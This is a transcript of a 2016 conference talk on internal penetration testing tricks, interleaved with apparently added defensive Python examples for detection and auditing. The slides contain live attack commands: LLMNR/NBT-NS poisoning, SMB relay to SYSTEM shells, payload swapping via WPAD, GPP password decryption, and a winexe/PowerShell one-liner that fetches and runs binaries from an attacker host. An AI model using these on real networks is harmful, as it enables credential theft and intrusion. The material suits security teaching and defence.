
Internal Pentest: from z3r0 to h3r0


This presentation talks about tricks and tools to use during internal penetration tests gigs. It was presented at Roadsec SP in November 2016.


  1. THE BIGGEST HACKER FESTIVAL IN LATIN AMERICA
  2. Internal Pentest: From z3r0 to h3r0, by Márcio "pimps" Almeida
  3. Internal Pentest From z3r0 to h3r0 – Márcio Almeida. Disclaimer
     • Slides in English, but I'll speak in Portuguese.
     • This presentation doesn't contain any tool created or invented by me, only how I use "well known" tools and how I automate their use...
     • In this presentation I'll only talk about ideas and tricks that I personally use during internal penetration test engagements.
  4. whoami (22/11/16)
     • a.k.a. Pimps
     • CTF player (web and crypto)
     • Proud member of the TheGoonies CTF team; check our writeups at: https://thegoonies.rocks
     • Penetration tester (7+ years): Tempest, Cipher, SpiderLabs and Securus Global
     • Previous presentations: Black Hat SP, BSides LV, Ekoparty, Thotcon, AlligatorCon, YSTS…
  5. Scenario we will talk about
     • Internal penetration testing
     • 100% black box (plug and play)
     • Time constraint (3-5 days)
     • Without "low-hanging fruits"
     • Anti-virus and some other protections in place
  6. Agenda
     • Unfortunately we only have 40 minutes, so I chose:
     • Reconnaissance tricks on black-box testing
     • LLMNR and NBT-NS poisoning
     • GPOs / GPPs
     • Shellcode Execution - SCE
  7. RECONNAISSANCE TRICKS ON BLACKBOX TESTING
  8. Domain Computer Accounts
     • First enumerate all Domain Controllers: nslookup, ping domain_name, dsquery, etc…
     • Use enum4linux to enumerate all users on the domain (if null sessions are enabled, or using a credential).
     • Extract all machine usernames (accounts with $ at the end of the username, like user$).
     • Nmap all those userX$.domain_name names to get their IP addresses and open ports. Repeat the nmap process in all the different subnets.
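Slide 8 turns the domain's user list into a host inventory by keeping the accounts that end in `$` (machine accounts) and resolving them as `<name>.<domain>`. The Python below is an added example, not from the deck or from enum4linux; it parses the `user:[NAME] rid:[0xNNN]` lines that enum4linux prints for its user enumeration and builds that host list. The sample output and the domain name `corp.example` are constructed here for illustration.

```python
import re

# Constructed sample of enum4linux user-enumeration output (not real data).
SAMPLE_ENUM4LINUX_OUTPUT = """\
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[jdoe] rid:[0x450]
user:[WKS-FIN-01$] rid:[0x451]
user:[WKS-FIN-02$] rid:[0x452]
user:[SRV-FILE-01$] rid:[0x453]
"""

# One enum4linux user line: the account name in brackets, then the RID in hex.
USER_LINE = re.compile(r"^user:\[(?P<name>[^\]]+)\]\s+rid:\[(?P<rid>0x[0-9a-fA-F]+)\]")


def parse_accounts(text):
    """Return a list of (account_name, rid) tuples for every user line found."""
    accounts = []
    for line in text.splitlines():
        match = USER_LINE.match(line.strip())
        if match:
            accounts.append((match.group("name"), int(match.group("rid"), 16)))
    return accounts


def machine_accounts(accounts):
    """Machine accounts are the ones whose sAMAccountName ends with '$'."""
    return [name for name, _rid in accounts if name.endswith("$")]


def to_fqdns(machine_names, domain):
    """Strip the trailing '$' and append the DNS domain, lower-cased for nmap/DNS."""
    return [f"{name.rstrip('$').lower()}.{domain.lower()}" for name in machine_names]


def build_inventory(text, domain):
    """End-to-end: enum4linux output -> list of host names to resolve and scan."""
    return to_fqdns(machine_accounts(parse_accounts(text)), domain)


if __name__ == "__main__":
    for host in build_inventory(SAMPLE_ENUM4LINUX_OUTPUT, "corp.example"):
        print(host)
```

Written one per line to a file, the result can be handed to nmap with `-iL <file>`, which is the step the slide describes next; user accounts without the `$` suffix are left out of the inventory.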
  9. Identifying "Live Subnets"
     • You don't need to scan all IPs to identify live subnets…
     • Scan well-known IP addresses with well-known ports to identify live addresses in subnets: x.x.x.1, x.x.x.101, x.x.x.192, x.x.x.201, x.x.x.253, x.x.x.254
     • Scan common ports: 21, 22, 23, 25, 53, 80, 443, 445, 3389
  10. Identifying "Live Hosts"
     • Once you find a subnet with a live IP, scan the whole subnet with a tuned nmap command:
       nmap -A -T4 -n --top-ports 1000 --max-rtt-timeout=500ms --initial-rtt-timeout=200ms --min-rtt-timeout=200ms --open --stats-every 5s x.x.x.0/24
  11. LLMNR AND NBT-NS POISONING
  12. LLMNR and NBT-NS Poisoning
     • The victim machine wants to reach the print server at printserver, but mistakenly types pintserver.
     • The DNS server responds to the victim saying that it doesn't know that host.
     • The victim then asks (via LLMNR/NBT-NS) whether anyone on the local network knows the location of pintserver.
     • The attacker responds to the victim claiming that it actually is pintserver.
     • The victim believes the attacker and sends its own username and NTLMv2 hash to the attacker.
     • The attacker can now crack the hash to discover the password.
  13. LLMNR and NBT-NS Poisoning
  14. Responder by @lgandx – https://github.com/lgandx/Responder
     • Performs LLMNR/NBT-NS/mDNS poisoning in an easy and highly effective way, and stores the captured hashes and clear-text credentials into files.
     • Pre-requisite: install Python
     • git clone https://github.com/lgandx/Responder.git
     • cd Responder
     • ./Responder.py -I eth0 -rPv
     • Use john or hashcat to crack the captured NTLMv2 hashes via dictionary attack… If you don't have a good wordlist you can use rockyou.txt. It works well for me on most occasions...
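The exchange on slides 12 and 14 (a host asks the local link for a name that DNS could not resolve, and a poisoner answers for it) is also what lets a defender spot a poisoner on the segment. LLMNR queries are plain DNS-format messages sent to multicast 224.0.0.252 on UDP port 5355, and a name that was just invented should never get an answer, so anyone who replies is answering for names it does not own. The Python below is an added example, not part of the original deck or of Responder: it builds such a canary query, parses any reply, and reports the responder's address. The poisoned response it checks offline is constructed here for illustration; the network probe only runs when `--probe` is passed.

```python
import random
import socket
import struct
import sys

LLMNR_GROUP = "224.0.0.252"   # LLMNR IPv4 multicast group
LLMNR_PORT = 5355


def encode_name(name):
    """DNS label encoding: length-prefixed labels terminated by a zero byte."""
    out = b""
    for label in name.strip(".").split("."):
        raw = label.encode("ascii")
        out += struct.pack("B", len(raw)) + raw
    return out + b"\x00"


def build_llmnr_query(name, txid):
    """Standard query: header (txid, flags=0, 1 question), then the question for an A record."""
    header = struct.pack("!HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", 1, 1)   # QTYPE=A, QCLASS=IN


def decode_name(data, offset):
    """Decode a (possibly compressed) DNS name; return (name, offset after the name)."""
    labels, jumped, end = [], False, offset
    while True:
        length = data[offset]
        if length == 0:
            offset += 1
            break
        if length & 0xC0 == 0xC0:                    # compression pointer
            pointer = struct.unpack("!H", data[offset:offset + 2])[0] & 0x3FFF
            if not jumped:
                end = offset + 2
            jumped, offset = True, pointer
            continue
        labels.append(data[offset + 1:offset + 1 + length].decode("ascii", "replace"))
        offset += 1 + length
    if not jumped:
        end = offset
    return ".".join(labels), end


def parse_llmnr_response(data, expected_txid):
    """Return [(name, ipv4), ...] for A records in a response to our txid, else []."""
    if len(data) < 12:
        return []
    txid, flags, qdcount, ancount, _ns, _ar = struct.unpack("!HHHHHH", data[:12])
    if txid != expected_txid or not (flags & 0x8000):   # wrong transaction or not a response
        return []
    offset = 12
    for _ in range(qdcount):                              # skip the echoed question(s)
        _, offset = decode_name(data, offset)
        offset += 4
    answers = []
    for _ in range(ancount):
        name, offset = decode_name(data, offset)
        rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", data[offset:offset + 10])
        offset += 10
        rdata = data[offset:offset + rdlen]
        offset += rdlen
        if rtype == 1 and rdlen == 4:
            answers.append((name, socket.inet_ntoa(rdata)))
    return answers


def build_fake_response(name, txid, ipv4):
    """Constructed sample of what a poisoner sends back: same txid, QR bit set, one A record."""
    header = struct.pack("!HHHHHH", txid, 0x8000, 1, 1, 0, 0)
    question = encode_name(name) + struct.pack("!HH", 1, 1)
    answer = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, 30, 4) + socket.inet_aton(ipv4)
    return header + question + answer


def canary_probe(timeout=2.0):
    """Send one query for a random name and collect every host that claims to own it."""
    name = "canary-%08x" % random.getrandbits(32)
    txid = random.getrandbits(16)
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 1)
    sock.settimeout(timeout)
    hits = []
    try:
        sock.sendto(build_llmnr_query(name, txid), (LLMNR_GROUP, LLMNR_PORT))
        while True:
            data, (src, _port) = sock.recvfrom(2048)
            for rname, ip in parse_llmnr_response(data, txid):
                hits.append((src, rname, ip))       # src answered a name nobody should own
    except socket.timeout:
        pass
    finally:
        sock.close()
    return name, hits


if __name__ == "__main__":
    sample = build_fake_response("canary-deadbeef", 0x1234, "10.0.0.99")
    print("offline check:", parse_llmnr_response(sample, 0x1234))
    if "--probe" in sys.argv:
        print("live probe:", canary_probe())
```

Any hit from `canary_probe` is worth an alert on its own; a scheduled run of the probe from a few segments is the cheapest way to notice a rogue responder, and the same query logic applies to NBT-NS on UDP 137 with its own name encoding.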
  15. DEMO: Responder by @lgandx – https://www.youtube.com/watch?v=mgAHX4h1ojI
  16. Responder + Proxenet by @hugsy – https://proxenet.readthedocs.io/en/dev/mitm/
     • Use Responder to spoof NetBIOS packets, poison the WPAD configuration of the Windows workstations on the local network, and redirect traffic to our evil box.
     • Add the plugin oPhishPoison.py to the autoload directory of proxenet and start it:
       ln -sf proxenet-plugins/oPhishPoison.py proxenet-plugins/autoload/oPhishPoison.py
       ./proxenet -b YOUR_IP -p 8008 -i -N
     • From the moment proxenet and Responder are configured and running, fake LLMNR and WPAD responses will be sent to the victims. By default, the loaded plugin will replace known binary content types (such as Office documents, ZIP files, RAR archives, etc.) with PE executables containing your payloads.
     • Please visit the link for detailed configuration.
  17. DEMO: Responder + Proxenet by @hugsy – https://www.youtube.com/watch?v=eN_HwFkyYyw
  18. Quick Overview: SMBRelay
  19. Responder + MultiRelay – http://g-laurent.blogspot.com.br/2016/10/introducing-responder-multirelay-10.html
     • MultiRelay was built to work in conjunction with Responder.py; the common usage scenario is:
     • Set SMB and HTTP to Off in Responder.conf
     • ./Responder.py -I eth0 -rv (on one screen)
     • ./tools/MultiRelay.py -t Target_IP -u Administrator/Daaccount/OtherAdmin/ALL (on another screen)
  20. Responder + MultiRelay – http://g-laurent.blogspot.com.br/2016/10/introducing-responder-multirelay-10.html
     • Once a relay has been successful, MultiRelay will give you an interactive shell allowing you to:
     • Remotely dump the LM and NT hashes on the target (which you can pass-the-hash with afterwards)
     • Remotely dump any registry keys under HKLM (sensitive information and configurations)
     • Read any file on the target
     • Download any file from the target
     • Execute any command as SYSTEM on the target
  21. MultiRelay DEMO by @lgandx – https://www.youtube.com/watch?v=c5GT9pAtnIw
  22. GPO – GROUP POLICY OBJECT / GPP – GROUP POLICY PREFERENCES
  23. Group Policies (GPO)
     • SYSVOL is a share present on the Domain Controllers to which all authenticated users have read access.
     • SYSVOL contains logon scripts, group policy data, and other domain-wide data which needs to be available everywhere.
     • All domain Group Policies are stored here: \\<DOMAIN_CONTROLLER>\SYSVOL\<DOMAIN_NAME>\Policies
  24. Clear-text Credentials on SYSVOL
  25. Group Policy Preferences (GPP)
     • In 2006, Microsoft bought Desktop Standard's "PolicyMaker", which they re-branded and released with Windows Server 2008 as "Group Policy Preferences".
     • One of the most useful features of Group Policy Preferences (GPP) is the ability to store and use credentials in several scenarios (change the local admin password, configure printers, configure shares, configure services, etc.).
     • Those credentials are stored encrypted. They are encrypted with AES-256, which should be good enough… But…
  26. Thanks Microsoft ;-* – https://msdn.microsoft.com/en-us/library/cc422924.aspx
  27. Decrypting GPP cpassword – https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1
       root@kali:~# gpp-decrypt j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw
       Local*P4ssword!
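Slides 23 to 27 rest on two facts: every authenticated user can read SYSVOL, and the GPP XML files stored there carry a `cpassword` attribute that is decryptable with a published key. The same two facts give a defender an audit: walk a mount or copy of SYSVOL and report every `cpassword` attribute, without decrypting anything. The Python below is an added example, not from the deck, from PowerSploit or from gpp-decrypt; it scans the six GPP file types that can carry credentials (Groups, Services, ScheduledTasks, DataSources, Printers, Drives) and records the file, the element and the account it belongs to. The sample Groups.xml is constructed here (its `cpassword` value is the one shown on slide 27; the clsid GUIDs are placeholders).

```python
import os
import xml.etree.ElementTree as ET

# GPP preference files that may hold a cpassword attribute.
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Printers.xml", "Drives.xml"}

# Attributes that name the account a cpassword belongs to, by preference type.
ACCOUNT_ATTRS = ("userName", "accountName", "runAs", "username", "name")

# Constructed sample Groups.xml (placeholder clsid/uid values; cpassword from slide 27).
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{00000000-0000-0000-0000-000000000001}">
  <User clsid="{00000000-0000-0000-0000-000000000002}" name="Administrator (built-in)"
        image="2" changed="2016-11-01 10:00:00" uid="{00000000-0000-0000-0000-000000000003}">
    <Properties action="U" newName="" fullName="" description=""
                cpassword="j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw"
                changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0"
                subAuthority="RID_ADMIN" userName="Administrator (built-in)"/>
  </User>
  <User clsid="{00000000-0000-0000-0000-000000000004}" name="helpdesk" image="2"
        uid="{00000000-0000-0000-0000-000000000005}">
    <Properties action="U" cpassword="" userName="helpdesk"/>
  </User>
</Groups>
"""


def account_of(elem):
    """Best-effort account label for the element that carries the cpassword."""
    for attr in ACCOUNT_ATTRS:
        value = elem.attrib.get(attr)
        if value:
            return value
    return ""


def scan_xml_text(xml_text, path="<memory>"):
    """Return one finding per element that has a cpassword attribute (empty ones flagged)."""
    findings = []
    root = ET.fromstring(xml_text)
    for elem in root.iter():
        cpw = elem.attrib.get("cpassword")
        if cpw is None:
            continue
        findings.append({
            "file": path,
            "element": elem.tag,
            "account": account_of(elem),
            "empty": cpw == "",        # cpassword="" means no password is stored
            "cpassword_len": len(cpw),
        })
    return findings


def scan_sysvol(root_dir):
    """Walk a SYSVOL mount or copy and scan every GPP file that can hold credentials."""
    findings = []
    for dirpath, _dirs, files in os.walk(root_dir):
        for filename in files:
            if filename not in GPP_FILES:
                continue
            full = os.path.join(dirpath, filename)
            try:
                with open(full, "rb") as fh:
                    findings.extend(scan_xml_text(fh.read(), full))
            except ET.ParseError as exc:
                findings.append({"file": full, "element": "<parse error>",
                                 "account": str(exc), "empty": True, "cpassword_len": 0})
    return findings


def stored_credentials(findings):
    """Only the findings that actually hold an encrypted password."""
    return [f for f in findings if not f["empty"]]


if __name__ == "__main__":
    for finding in stored_credentials(scan_xml_text(SAMPLE_GROUPS_XML, "Groups.xml")):
        print(f"{finding['file']}: <{finding['element']}> account={finding['account']!r} "
              f"cpassword={finding['cpassword_len']} chars")
```

Run against `\\<DOMAIN_CONTROLLER>\SYSVOL\<DOMAIN_NAME>\Policies` (the path from slide 23) mounted locally, every non-empty finding is a credential any domain user can recover. The MS14-025 update stops new `cpassword` values from being written but leaves existing files in place, so the audit is still needed after patching, and the only fix is to remove the preference and rotate the account's password.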
  28. Metasploit Module GPP
  29. SHELLCODE EXECUTION - SCE
  30. Shellcode Execution - SCE
     • HIGHLY EFFECTIVE for anti-virus bypass
     • My own experience: it worked perfectly 100% of the times that I needed to use it.
     • Works beautifully using winexe or psexec (God bless the Pass the Hash :-P)
     • Using a Domain Admin account it is possible to automate the mass p0wn4g3 on the network by "scripting" the command and reading the targets from a list.
     • Using a Meterpreter script you can also automate the capture of evidence on all compromised machines (screenshot, ifconfig, hashdump, mimikatz, getinfo, etc…)
  31. Shellcode Execution - SCE
     • Using Microsoft PowerShell it is possible to download the binary (wget style) to a temporary directory, execute it and erase the file afterwards:
     • On the attacker machine execute: python -m SimpleHTTPServer
     • This will enable http://YOUR_MACHINE:8000/ on the attacker machine
     • winexe --user=DOMAIN/USER%HASH_OR_PASSWORD //TARGET "cmd /c "del teste.bat & echo powershell -c "(new-object System.Net.WebClient).DownloadFile('http://YOUR_MACHINE:8000/sce.32.exe','sce.32.exe')" >> teste.bat & echo powershell -c "(new-object System.Net.WebClient).DownloadFile('http://YOUR_MACHINE:8000/hack.bat','hack.bat')" >> teste.bat & echo hack.bat >> teste.bat & teste.bat""
  32. SCEPWN-NG by @joshuaskorich – https://github.com/joshuaskorich/scepwn-ng
     • Using a Samba share you can execute the binary directly from the shared folder, injecting the Meterpreter session directly into memory without any file ever touching the disk!
     • Details of how to configure the environment are on the scepwn-ng GitHub.
     • After configuring your environment and getting a privileged account, just execute:
       ./scepwn-ng.rb -u 'username%password_or_hash' -t TARGET
     • If you put this command in a loop reading from a list of targets and use a Meterpreter script to automate commands on the targets, it becomes a mass auto-pwn tool.
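Slides 30 to 32 show the chain on the target side: a service-based remote execution tool (winexe or psexec) spawns cmd.exe, cmd.exe writes a batch file with `echo ... >> teste.bat`, and PowerShell's `WebClient.DownloadFile` fetches the binary before it runs. Each step leaves a process-creation record (Sysmon event 1, or Windows event 4688 with command-line auditing enabled), and the chain rather than any single binary is what a detection should key on. The Python below is an added example, not from the deck or from any tool it names: three rules evaluated over constructed process events. The parent names `winexesvc.exe` and `PSEXESVC.exe` are the service binaries winexe and PsExec install on the target; that mapping is an assumption stated here and should be checked against your own telemetry.

```python
import ntpath

# Constructed process-creation events (not from any real host). Fields mirror the
# minimum a Sysmon event 1 / Windows 4688 record provides: parent image, image, command line.
SAMPLE_EVENTS = [
    {"id": 1, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Browser\browser.exe",
     "cmdline": r'"C:\Program Files\Browser\browser.exe" --profile=default'},
    {"id": 2, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -c Get-Process | Sort-Object CPU"},
    {"id": 3, "parent": r"C:\Windows\winexesvc.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": 'cmd /c "del teste.bat & echo powershell -c ... >> teste.bat '
                '& echo hack.bat >> teste.bat & teste.bat"'},
    {"id": 4, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -c \"(new-object System.Net.WebClient)"
                ".DownloadFile('http://10.0.0.5:8000/sce.32.exe','sce.32.exe')\""},
]

# Service binaries dropped by winexe and PsExec (assumption; verify in your environment).
REMOTE_EXEC_SERVICES = {"winexesvc.exe", "psexesvc.exe"}


def basename(path):
    """Lower-cased file name of a Windows path, so rules compare names not paths."""
    return ntpath.basename(path).lower()


def rule_powershell_download(event):
    """PowerShell pulling a file over HTTP with WebClient.DownloadFile."""
    cmd = event["cmdline"].lower()
    return basename(event["image"]) == "powershell.exe" and "webclient" in cmd and "downloadfile" in cmd


def rule_remote_exec_service_parent(event):
    """Any process whose parent is a remote-execution service binary."""
    return basename(event["parent"]) in REMOTE_EXEC_SERVICES


def rule_batch_dropper_chain(event):
    """cmd.exe assembling a .bat file line by line with echo ... >> and then running it."""
    cmd = event["cmdline"].lower()
    return basename(event["image"]) == "cmd.exe" and "echo" in cmd and ">>" in cmd and ".bat" in cmd


RULES = {
    "powershell_download": rule_powershell_download,
    "remote_exec_service_parent": rule_remote_exec_service_parent,
    "batch_dropper_chain": rule_batch_dropper_chain,
}


def evaluate(event):
    """Names of every rule the event matches, sorted for stable output."""
    return sorted(name for name, check in RULES.items() if check(event))


def scan(events):
    """(event id, matched rules) for each event that matched at least one rule."""
    results = []
    for event in events:
        hits = evaluate(event)
        if hits:
            results.append((event["id"], hits))
    return results


if __name__ == "__main__":
    for event_id, hits in scan(SAMPLE_EVENTS):
        print(f"event {event_id}: {', '.join(hits)}")
```

Event 3 fires two rules at once (service parent plus batch assembly) and event 4 the download rule; the ordinary PowerShell in event 2 fires none. Correlating `remote_exec_service_parent` with a following `powershell_download` from the same host within a short window is the higher-confidence signal for the slide's technique, and the service installation itself (event 7045 for a new service named winexesvc or PSEXESVC) is an earlier point in the same chain to alert on.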
  33. Thank you! Twitter: @marcioalm – Email: marcioalma@gmail.com – #dontstophacking
